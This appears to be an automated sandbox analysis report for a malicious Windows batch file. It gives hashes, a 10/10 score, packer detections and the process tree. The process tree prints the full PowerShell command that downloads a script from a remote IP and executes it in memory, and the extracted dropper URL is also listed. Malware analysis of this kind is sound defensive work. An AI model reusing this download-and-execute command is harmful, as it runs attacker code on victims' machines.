Analysis
-
max time kernel
144s -
max time network
94s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
04-08-2020 12:18
Static task
static1
Behavioral task
behavioral1
Sample
0114183087da12ff757505a2a13eadf3.bat
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
0114183087da12ff757505a2a13eadf3.bat
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
0114183087da12ff757505a2a13eadf3.bat
-
Size
221B
-
MD5
0037a823920b7141736a18b53ea6858f
-
SHA1
6632e28571b04910e97f9305a13b57ea06ff09a4
-
SHA256
af6f3062596268dda5ce47e9bf6315f59cfa76b7aaaa809a76f6bdd69b4a6593
-
SHA512
39f35183c367850e5e63b63c1a6dc176498d5a80afb4b5314f8df7ac63f9b50519d76783cbc47e42068d54eee860d14515cbd6619f41c3061b9cde0b76e31a07
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/0114183087da12ff757505a2a13eadf3
Signatures
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
WerFault.exepid process 612 WerFault.exe 612 WerFault.exe 612 WerFault.exe 612 WerFault.exe 612 WerFault.exe 612 WerFault.exe 612 WerFault.exe 612 WerFault.exe 612 WerFault.exe 612 WerFault.exe 612 WerFault.exe 612 WerFault.exe 612 WerFault.exe -
ServiceHost packer 5 IoCs
Detects ServiceHost packer used for .NET malware
Processes:
resource yara_rule behavioral2/memory/652-2-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/652-3-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/652-4-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/652-5-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/652-6-0x0000000000000000-mapping.dmp servicehost -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 2076 wrote to memory of 652 2076 cmd.exe powershell.exe PID 2076 wrote to memory of 652 2076 cmd.exe powershell.exe PID 2076 wrote to memory of 652 2076 cmd.exe powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 612 652 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 612 WerFault.exe Token: SeBackupPrivilege 612 WerFault.exe Token: SeDebugPrivilege 612 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\0114183087da12ff757505a2a13eadf3.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/0114183087da12ff757505a2a13eadf3');Invoke-LMLCRVJXBWONTA;Start-Sleep -s 10000"2⤵PID:652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 7003⤵
- Suspicious behavior: EnumeratesProcesses
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:612